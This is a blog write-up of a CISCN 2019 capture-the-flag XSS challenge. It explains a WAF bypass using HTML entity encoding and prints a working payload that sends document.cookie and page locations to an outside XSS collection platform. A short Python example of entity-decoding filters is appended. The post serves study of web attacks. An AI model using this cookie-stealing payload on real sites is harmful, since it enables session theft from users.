Reproducing the challenge from [CISCN 2019 China Northeast Division Web2 WriteUp](https://www.zhaoj.in/read-6100.html)

I had never done an XSS challenge before; working through this one with the writeup, I felt there were a few things worth recording.

  1. XSS WAF bypass

    The parentheses () are filtered, so the whole payload is converted to HTML entity encoding; in practice this means writing each character as &# followed by its ASCII code.

  2. Payload

    <svg><script>eval&#40&#34" + output + "&#34&#41</script>

    output is the following code converted to HTML entity encoding. It is the default payload that comes with the XSS platform, which I had not understood before, so I have reformatted the code here.

    (function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0
     &location='+escape((function(){try{return document.location.href}catch(e){return''}})())+
     '&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+
     '&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+
     '&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

    Very clear: data such as document.cookie obtained this way is sent out by a GET request directly to the XSS platform.

    You can try accessing this directly: http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&cookie=123

    (Replace the id with that of your own project)

    The corresponding project will then receive the corresponding cookie: 1234

    The platform comes with many payloads; the ones I analysed before never succeeded, but this one finally worked, hhh, a little exciting.

  3. CSP bypass

    I spent two days on this and did not figure it out.

  4. substr(md5($str), 0, 6) === "d05a29"

    Hash collision with the birthday attack

  5. There is a lot I feel I have not written down!!! To be added.
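On items 1 and 2 above: the bypass works because the browser resolves numeric character references such as &#40 (no trailing semicolon required) into the literal characters before the script runs, while a filter that only matches literal parentheses never sees them. The Python below is an added example, not code from the original post or from the XSS platform: it uses a hypothetical literal-match filter and a constructed payload in the same style as the page's, and shows the filter missing the encoded payload but catching it once the input is entity-decoded first.

```python
import html

# Constructed sample, modelled on the page's payload: every '(' ')' and '"'
# is written as a numeric character reference, mostly without the trailing ';'.
ENCODED_PAYLOAD = '<svg><script>eval&#40&#34alert&#40;1&#41;&#34&#41</script>'

# Characters the hypothetical WAF refuses (assumption: it matches literals only).
BLOCKED_CHARS = ('(', ')')


def decode_entities(payload: str) -> str:
    """Resolve HTML character references the way a browser would.

    html.unescape() also resolves numeric references that lack the trailing
    ';' (e.g. '&#40' -> '('), which is exactly the form the bypass relies on.
    """
    return html.unescape(payload)


def naive_filter_blocks(payload: str) -> bool:
    """Literal-match filter: True only if a blocked character appears verbatim."""
    return any(ch in payload for ch in BLOCKED_CHARS)


def normalized_filter_blocks(payload: str) -> bool:
    """Same check, applied after entity decoding, so encoded forms are caught too."""
    return any(ch in decode_entities(payload) for ch in BLOCKED_CHARS)


if __name__ == "__main__":
    print("decoded   :", decode_entities(ENCODED_PAYLOAD))
    print("naive     :", naive_filter_blocks(ENCODED_PAYLOAD))       # False: bypassed
    print("normalized:", normalized_filter_blocks(ENCODED_PAYLOAD))  # True: caught
```

The same normalization step (decode, then inspect) is what a filter or detection rule needs before matching, since the characters the WAF is looking for simply do not exist in the raw request.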


Source: www.cnblogs.com/thenbz3/p/11863641.html